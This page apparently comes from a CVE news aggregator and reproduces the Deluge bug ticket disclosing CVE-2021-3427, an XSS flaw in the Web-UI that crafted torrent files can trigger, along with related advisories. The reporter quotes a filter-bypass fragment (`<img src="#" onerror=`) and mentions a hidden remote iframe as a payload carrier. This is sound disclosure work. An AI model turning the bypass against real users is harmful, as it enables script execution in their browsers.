Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-3427: [Deluge] #3460: XSS via malicious .torrent file

The Deluge Web-UI is vulnerable to XSS through a crafted torrent file. The the data from torrent files is not properly sanitised as it’s interpreted directly as HTML. Someone who supplies the user with a malicious torrent file can execute arbitrary Javascript code in the context of the user’s browser session.

CVE
#xss#vulnerability#web#google#git#java#perl

Deluge

unread,

Mar 1, 2021, 9:23:05 PM3/1/21

to delug…@googlegroups.com

#3460: XSS via malicious .torrent file
----------------------------±-------------------
Reporter: jasperla | Type: bug
Status: new | Priority: major
Milestone: needs verified | Component: Web UI
Version: develop | Keywords:
----------------------------±-------------------
The Deluge web ui is vulnerable to XSS through a crafted torrent file.

As the data from torrent files is not properly sanitised it’s interpreted
directly as HTML. As such someone who supplies the user with a malicious
torrent can execute arbitrary Javascript code in the context of the user’s
browser session. It should be noted that the Tornado webserver is not
configured to send any `Content-Security-Policy` headers which can help to
mitigate some of the impact. Due to this omission, the attacker can
download/upload arbitrary data from/to remote endpoints.

It should be noted there is some basic filtering such that a `<script>`
doesn’t work, but this can be trivially bypassed by using a construct such
as `<img src="#" onerror=` or just a hidden, remote iframe which loads the
Javascript payload (see the PoC script for an example).

This script creates a PoC torrent to demonstrate the vulnerability:
https://gist.github.com/jasperla/4e6e06034e1cc4131f62839b46b697ef
the attached screenshot is taken after uploading a .torrent file generated
by that script.

Additionally there are several HTML injection bugs, for example in the
'’Connection Manager’’, but these are merely bugs as the local user
injects the payload as opposed to a remote attacker who uploads a
malicious torrent to a public search engine.


Ticket URL: https://dev.deluge-torrent.org/ticket/3460\
Deluge https://deluge-torrent.org/\
Deluge Project

Deluge

unread,

Mar 1, 2021, 9:23:22 PM3/1/21

to delug…@googlegroups.com

#3460: XSS via malicious .torrent file

-----------------------±---------------------------
Reporter: jasperla | Owner:

Type: bug | Status: new
Priority: major | Milestone: needs verified
Component: Web UI | Version: develop

Resolution: | Keywords:
-----------------------±---------------------------
Changes (by jasperla):

* Attachment “deluge xss.png” added.

Deluge

unread,

Mar 1, 2021, 9:25:32 PM3/1/21

to delug…@googlegroups.com

#3460: XSS via malicious .torrent file

-----------------------±---------------------------
Reporter: jasperla | Owner:

Type: bug | Status: new
Priority: major | Milestone: needs verified
Component: Web UI | Version: develop

Resolution: | Keywords:
-----------------------±---------------------------

Comment (by jasperla):

Please close this ticket, it’s a duplicate of #3459.


Ticket URL: https://dev.deluge-torrent.org/ticket/3460#comment:1\

Related news

Gentoo Linux Security Advisory 202210-07

Gentoo Linux Security Advisory 202210-7 - A vulnerability has been found in Deluge which could result in XSS. Versions less than 2.1.1 are affected.

GHSA-5c8p-qhch-qhx6: Deluge Web-UI vulnerable to XSS through a crafted torrent file

The Deluge Web-UI is vulnerable to cross-site scripting through a crafted torrent file. The the data from torrent files is not properly sanitised as it's interpreted directly as HTML. Someone who supplies the user with a malicious torrent file can execute arbitrary Javascript code in the context of the user's browser session.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907